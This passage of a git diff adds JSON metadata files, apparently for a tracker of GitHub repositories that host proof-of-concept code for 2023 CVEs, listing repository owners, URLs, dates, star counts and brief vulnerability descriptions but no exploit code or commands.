"forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5546.json b/2023/CVE-2023-5546.json new file mode 100644 index 0000000000..83eba2b72b --- /dev/null +++ b/2023/CVE-2023-5546.json @@ -0,0 +1,33 @@ +[ + { + "id": 681157074, + "name": "CVE-2023-5546", + "full_name": "obelia01\/CVE-2023-5546", + "owner": { + "login": "obelia01", + "id": 82713832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82713832?v=4", + "html_url": "https:\/\/github.com\/obelia01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/obelia01\/CVE-2023-5546", + "description": null, + "fork": false, + "created_at": "2023-08-21T11:50:01Z", + "updated_at": "2023-08-21T11:50:02Z", + "pushed_at": "2023-08-21T11:50:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5561.json b/2023/CVE-2023-5561.json new file mode 100644 index 0000000000..d98c2e56f9 --- /dev/null +++ b/2023/CVE-2023-5561.json @@ -0,0 +1,33 @@ +[ + { + "id": 731244611, + "name": "CVE-2023-5561-PoC", + "full_name": "pog007\/CVE-2023-5561-PoC", + "owner": { + "login": "pog007", + "id": 124298592, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124298592?v=4", + "html_url": "https:\/\/github.com\/pog007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pog007\/CVE-2023-5561-PoC", + "description": "WordPress does not properly restrict which user fields are searchable via the REST API, allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack", + "fork": false, + "created_at": "2023-12-13T16:43:18Z", + "updated_at": "2024-09-04T06:48:57Z", + "pushed_at": "2023-12-13T16:47:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5717.json b/2023/CVE-2023-5717.json new file mode 100644 index 0000000000..0e5f80f17e --- /dev/null +++ b/2023/CVE-2023-5717.json @@ -0,0 +1,33 @@ +[ + { + "id": 747097463, + "name": "CVE-2023-5717", + "full_name": "uthrasri\/CVE-2023-5717", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-5717", + "description": null, + "fork": false, + "created_at": "2024-01-23T09:04:00Z", + "updated_at": "2024-01-23T09:07:21Z", + "pushed_at": "2024-01-23T09:08:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5720.json b/2023/CVE-2023-5720.json new file mode 100644 index 0000000000..a44d1a08ca --- /dev/null +++ b/2023/CVE-2023-5720.json @@ -0,0 +1,95 @@ +[ + { + "id": 786209592, + "name": "CVE-2023-5720-2", + "full_name": "miguelc49\/CVE-2023-5720-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-5720-2", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:31Z", + "updated_at": "2024-04-14T17:41:22Z", + "pushed_at": "2024-04-15T22:42:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209609, + "name": "CVE-2023-5720-1", + "full_name": "miguelc49\/CVE-2023-5720-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-5720-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:35Z", + "updated_at": "2024-04-14T17:41:20Z", + "pushed_at": "2024-04-15T19:58:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209627, + "name": "CVE-2023-5720-3", + "full_name": "miguelc49\/CVE-2023-5720-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-5720-3", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:39Z", + "updated_at": "2024-04-14T17:41:26Z", + "pushed_at": "2024-04-15T20:00:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5808.json b/2023/CVE-2023-5808.json new file mode 100644 index 0000000000..5423dca05b --- /dev/null +++ b/2023/CVE-2023-5808.json @@ -0,0 +1,33 @@ +[ + { + "id": 732971718, + "name": "CVE-2023-5808", + "full_name": "Arszilla\/CVE-2023-5808", + "owner": { + "login": "Arszilla", + "id": 22989170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22989170?v=4", + "html_url": "https:\/\/github.com\/Arszilla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arszilla\/CVE-2023-5808", + "description": null, + "fork": false, + "created_at": "2023-12-18T09:24:14Z", + "updated_at": "2024-12-07T20:10:13Z", + "pushed_at": "2023-12-18T09:24:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5961.json b/2023/CVE-2023-5961.json new file mode 100644 index 0000000000..75167e2c6d --- /dev/null +++ b/2023/CVE-2023-5961.json @@ -0,0 +1,33 @@ +[ + { + "id": 750906260, + "name": "CVE-2023-5961", + "full_name": "HadessCS\/CVE-2023-5961", + "owner": { + "login": "HadessCS", + "id": 102136070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102136070?v=4", + "html_url": "https:\/\/github.com\/HadessCS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HadessCS\/CVE-2023-5961", + "description": "moxa ioLogik E1212", + "fork": false, + "created_at": "2024-01-31T15:00:16Z", + "updated_at": "2024-02-27T15:19:44Z", + "pushed_at": "2024-01-31T15:03:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5965.json b/2023/CVE-2023-5965.json new file mode 100644 index 0000000000..413c0565aa --- /dev/null +++ b/2023/CVE-2023-5965.json @@ -0,0 +1,33 @@ +[ + { + "id": 554898866, + "name": "cve-2023-5965", + "full_name": "pedrojosenavasperez\/cve-2023-5965", + "owner": { + "login": "pedrojosenavasperez", + "id": 115498883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115498883?v=4", + "html_url": "https:\/\/github.com\/pedrojosenavasperez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pedrojosenavasperez\/cve-2023-5965", + "description": null, + "fork": false, + "created_at": "2022-10-20T15:35:07Z", + "updated_at": "2023-11-13T17:27:18Z", + "pushed_at": "2023-11-13T17:26:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5966.json b/2023/CVE-2023-5966.json new file mode 100644 index 0000000000..3d5e18d153 --- /dev/null +++ b/2023/CVE-2023-5966.json @@ -0,0 +1,33 @@ +[ + { + "id": 554819475, + "name": "cve-2023-5966", + "full_name": "pedrojosenavasperez\/cve-2023-5966", + "owner": { + "login": "pedrojosenavasperez", + "id": 115498883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115498883?v=4", + "html_url": "https:\/\/github.com\/pedrojosenavasperez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pedrojosenavasperez\/cve-2023-5966", + "description": null, + "fork": false, + "created_at": "2022-10-20T13:00:10Z", + "updated_at": "2024-09-21T12:08:42Z", + "pushed_at": "2023-11-13T17:24:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6000.json b/2023/CVE-2023-6000.json new file mode 100644 index 0000000000..1a3e247973 --- /dev/null +++ b/2023/CVE-2023-6000.json @@ -0,0 +1,33 @@ +[ + { + "id": 872483237, + "name": "CVE-2023-6000-POC", + "full_name": "RonF98\/CVE-2023-6000-POC", + "owner": { + "login": "RonF98", + "id": 181740430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181740430?v=4", + "html_url": "https:\/\/github.com\/RonF98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RonF98\/CVE-2023-6000-POC", + "description": "This vulnerability displays an XSS flaw in a WordPress popup plugin, allowing attackers to inject malicious JavaScript through a stored XSS", + "fork": false, + "created_at": "2024-10-14T14:11:02Z", + "updated_at": "2024-11-25T09:53:43Z", + "pushed_at": "2024-10-15T13:55:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6019.json b/2023/CVE-2023-6019.json new file mode 100644 index 0000000000..42d677a45a --- /dev/null +++ b/2023/CVE-2023-6019.json @@ -0,0 +1,157 @@ +[ + { + "id": 784652268, + "name": "CVE-2023-6019", + "full_name": "FireWolfWang\/CVE-2023-6019", + "owner": { + "login": "FireWolfWang", + "id": 33483801, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33483801?v=4", + "html_url": "https:\/\/github.com\/FireWolfWang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FireWolfWang\/CVE-2023-6019", + "description": "Ray OS Command Injection RCE(Unauthorized)", + "fork": false, + "created_at": "2024-04-10T09:24:06Z", + "updated_at": "2024-04-11T13:50:19Z", + "pushed_at": "2024-04-10T09:28:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209900, + "name": "CVE-2023-6019-2", + "full_name": "miguelc49\/CVE-2023-6019-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-6019-2", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:44Z", + "updated_at": "2024-04-14T17:41:33Z", + "pushed_at": "2024-04-14T17:41:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209916, + "name": "CVE-2023-6019-1", + "full_name": "miguelc49\/CVE-2023-6019-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-6019-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:49Z", + "updated_at": "2024-04-14T17:41:29Z", + "pushed_at": "2024-04-14T17:41:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786353747, + "name": "CVE-2023-6019-3", + "full_name": "miguelc49\/CVE-2023-6019-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-6019-3", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:35:11Z", + "updated_at": "2024-04-14T17:41:39Z", + "pushed_at": "2024-04-14T17:41:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789777022, + "name": "CVE-2023-6019", + "full_name": "Clydeston\/CVE-2023-6019", + "owner": { + "login": "Clydeston", + "id": 47860813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47860813?v=4", + "html_url": "https:\/\/github.com\/Clydeston", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Clydeston\/CVE-2023-6019", + "description": "Python POC for CVE-2023-6019 taken from https:\/\/huntr.com\/bounties\/d0290f3c-b302-4161-89f2-c13bb28b4cfe", + "fork": false, + "created_at": "2024-04-21T14:30:28Z", + "updated_at": "2024-06-10T16:37:07Z", + "pushed_at": "2024-04-21T14:32:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6036.json b/2023/CVE-2023-6036.json new file mode 100644 index 0000000000..b65d5ce93e --- /dev/null +++ b/2023/CVE-2023-6036.json @@ -0,0 +1,33 @@ +[ + { + "id": 750960186, + "name": "CVE-2023-6036", + "full_name": "pctripsesp\/CVE-2023-6036", + "owner": { + "login": "pctripsesp", + "id": 17095580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17095580?v=4", + "html_url": "https:\/\/github.com\/pctripsesp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pctripsesp\/CVE-2023-6036", + "description": "POC about Web3 – Crypto wallet Login & NFT token gating < 3.0.0 - Authentication Bypass Wordpress plugin", + "fork": false, + "created_at": "2024-01-31T16:58:48Z", + "updated_at": "2024-02-01T14:21:59Z", + "pushed_at": "2024-01-31T17:42:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6063.json b/2023/CVE-2023-6063.json new file mode 100644 index 0000000000..1453a631d5 --- /dev/null +++ b/2023/CVE-2023-6063.json @@ -0,0 +1,95 @@ +[ + { + "id": 719146234, + "name": "CVE-2023-6063-PoC", + "full_name": "motikan2010\/CVE-2023-6063-PoC", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2023-6063-PoC", + "description": "CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)", + "fork": false, + "created_at": "2023-11-15T14:53:03Z", + "updated_at": "2024-06-26T12:02:24Z", + "pushed_at": "2023-11-15T14:53:48Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719663902, + "name": "CVE-2023-6063-PoC", + "full_name": "hackersroot\/CVE-2023-6063-PoC", + "owner": { + "login": "hackersroot", + "id": 128667885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128667885?v=4", + "html_url": "https:\/\/github.com\/hackersroot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackersroot\/CVE-2023-6063-PoC", + "description": "Exploiting SQL Injection Vulnerability in WP Fastest Cache (CVE-2023-6063)", + "fork": false, + "created_at": "2023-11-16T16:36:44Z", + "updated_at": "2023-11-16T16:36:45Z", + "pushed_at": "2023-11-16T16:41:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719689698, + "name": "CVE-2023-6063", + "full_name": "thesafdari\/CVE-2023-6063", + "owner": { + "login": "thesafdari", + "id": 122823051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122823051?v=4", + "html_url": "https:\/\/github.com\/thesafdari", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thesafdari\/CVE-2023-6063", + "description": "CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)", + "fork": false, + "created_at": "2023-11-16T17:41:59Z", + "updated_at": "2024-11-20T21:28:27Z", + "pushed_at": "2023-11-16T17:44:39Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6241.json b/2023/CVE-2023-6241.json new file mode 100644 index 0000000000..01f58d6286 --- /dev/null +++ b/2023/CVE-2023-6241.json @@ -0,0 +1,42 @@ +[ + { + "id": 794812900, + "name": "CVE-2023-6241", + "full_name": "s1204IT\/CVE-2023-6241", + "owner": { + "login": "s1204IT", + "id": 52069677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52069677?v=4", + "html_url": "https:\/\/github.com\/s1204IT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s1204IT\/CVE-2023-6241", + "description": "CVE-2023-6241 for Pixel 8", + "fork": false, + "created_at": "2024-05-02T02:17:31Z", + "updated_at": "2024-12-12T16:41:59Z", + "pushed_at": "2024-10-17T19:39:45Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [ + "android", + "android-14", + "arm", + "google", + "mali", + "pixel", + "pixel8", + "poc" + ], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6246.json b/2023/CVE-2023-6246.json new file mode 100644 index 0000000000..a60920f4a3 --- /dev/null +++ b/2023/CVE-2023-6246.json @@ -0,0 +1,33 @@ +[ + { + "id": 766195734, + "name": "CVE-2023-6246", + "full_name": "elpe-pinillo\/CVE-2023-6246", + "owner": { + "login": "elpe-pinillo", + "id": 30589235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30589235?v=4", + "html_url": "https:\/\/github.com\/elpe-pinillo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elpe-pinillo\/CVE-2023-6246", + "description": null, + "fork": false, + "created_at": "2024-03-02T15:45:52Z", + "updated_at": "2024-12-17T09:22:49Z", + "pushed_at": "2024-03-06T20:12:50Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6275.json b/2023/CVE-2023-6275.json new file mode 100644 index 0000000000..c27f6ca648 --- /dev/null +++ b/2023/CVE-2023-6275.json @@ -0,0 +1,33 @@ +[ + { + "id": 851979196, + "name": "CVE-2023-6275", + "full_name": "erickfernandox\/CVE-2023-6275", + "owner": { + "login": "erickfernandox", + "id": 2186082, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2186082?v=4", + "html_url": "https:\/\/github.com\/erickfernandox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erickfernandox\/CVE-2023-6275", + "description": "Reflected Cross-Site Scripting in TOTVS Fluig Plataform 1.6.X - 1.8.1", + "fork": false, + "created_at": "2024-09-04T02:33:46Z", + "updated_at": "2024-10-01T14:04:30Z", + "pushed_at": "2024-09-17T15:08:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6289.json b/2023/CVE-2023-6289.json new file mode 100644 index 0000000000..92a1017637 --- /dev/null +++ b/2023/CVE-2023-6289.json @@ -0,0 +1,33 @@ +[ + { + "id": 724794135, + "name": "CVE-2023-6289", + "full_name": "RandomRobbieBF\/CVE-2023-6289", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-6289", + "description": "Swift Performance Lite <= 2.3.6.14 - Missing Authorization to Unauthenticated Settings Export", + "fork": false, + "created_at": "2023-11-28T20:05:43Z", + "updated_at": "2023-11-28T20:05:44Z", + "pushed_at": "2023-11-28T20:07:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6319.json b/2023/CVE-2023-6319.json new file mode 100644 index 0000000000..c40751b124 --- /dev/null +++ b/2023/CVE-2023-6319.json @@ -0,0 +1,38 @@ +[ + { + "id": 785372711, + "name": "root-my-webos-tv", + "full_name": "illixion\/root-my-webos-tv", + "owner": { + "login": "illixion", + "id": 14954655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14954655?v=4", + "html_url": "https:\/\/github.com\/illixion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/illixion\/root-my-webos-tv", + "description": "CVE-2023-6319 proof of concept", + "fork": false, + "created_at": "2024-04-11T18:58:17Z", + "updated_at": "2025-01-05T15:56:13Z", + "pushed_at": "2024-10-17T11:18:46Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-6319", + "exploit", + "tv", + "webos" + ], + "visibility": "public", + "forks": 4, + "watchers": 40, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6350.json b/2023/CVE-2023-6350.json new file mode 100644 index 0000000000..1013f1a49e --- /dev/null +++ b/2023/CVE-2023-6350.json @@ -0,0 +1,33 @@ +[ + { + "id": 864923088, + "name": "CVE-2023-6350_Reproduction", + "full_name": "dywsy21\/CVE-2023-6350_Reproduction", + "owner": { + "login": "dywsy21", + "id": 150417245, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150417245?v=4", + "html_url": "https:\/\/github.com\/dywsy21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dywsy21\/CVE-2023-6350_Reproduction", + "description": null, + "fork": false, + "created_at": "2024-09-29T14:29:26Z", + "updated_at": "2024-10-17T12:09:18Z", + "pushed_at": "2024-10-17T12:09:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6421.json b/2023/CVE-2023-6421.json new file mode 100644 index 0000000000..5f7967239b --- /dev/null +++ b/2023/CVE-2023-6421.json @@ -0,0 +1,33 @@ +[ + { + "id": 870113743, + "name": "CVE-2023-6421", + "full_name": "RandomRobbieBF\/CVE-2023-6421", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-6421", + "description": "Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak", + "fork": false, + "created_at": "2024-10-09T13:18:10Z", + "updated_at": "2024-10-18T17:57:25Z", + "pushed_at": "2024-10-09T13:20:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6444.json b/2023/CVE-2023-6444.json new file mode 100644 index 0000000000..6a56f3d239 --- /dev/null +++ b/2023/CVE-2023-6444.json @@ -0,0 +1,33 @@ +[ + { + "id": 839110924, + "name": "CVE-2023-6444-POC", + "full_name": "Wayne-Ker\/CVE-2023-6444-POC", + "owner": { + "login": "Wayne-Ker", + "id": 94828747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94828747?v=4", + "html_url": "https:\/\/github.com\/Wayne-Ker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wayne-Ker\/CVE-2023-6444-POC", + "description": "Proof of concept on Unauthenticated Administrator Email Disclosure CVE-2023-6444", + "fork": false, + "created_at": "2024-08-07T01:58:04Z", + "updated_at": "2024-08-07T02:23:47Z", + "pushed_at": "2024-08-07T02:23:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6538.json b/2023/CVE-2023-6538.json new file mode 100644 index 0000000000..431ce288cc --- /dev/null +++ b/2023/CVE-2023-6538.json @@ -0,0 +1,33 @@ +[ + { + "id": 732973718, + "name": "CVE-2023-6538", + "full_name": "Arszilla\/CVE-2023-6538", + "owner": { + "login": "Arszilla", + "id": 22989170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22989170?v=4", + "html_url": "https:\/\/github.com\/Arszilla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arszilla\/CVE-2023-6538", + "description": null, + "fork": false, + "created_at": "2023-12-18T09:29:42Z", + "updated_at": "2023-12-18T09:29:48Z", + "pushed_at": "2023-12-18T09:29:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6553.json 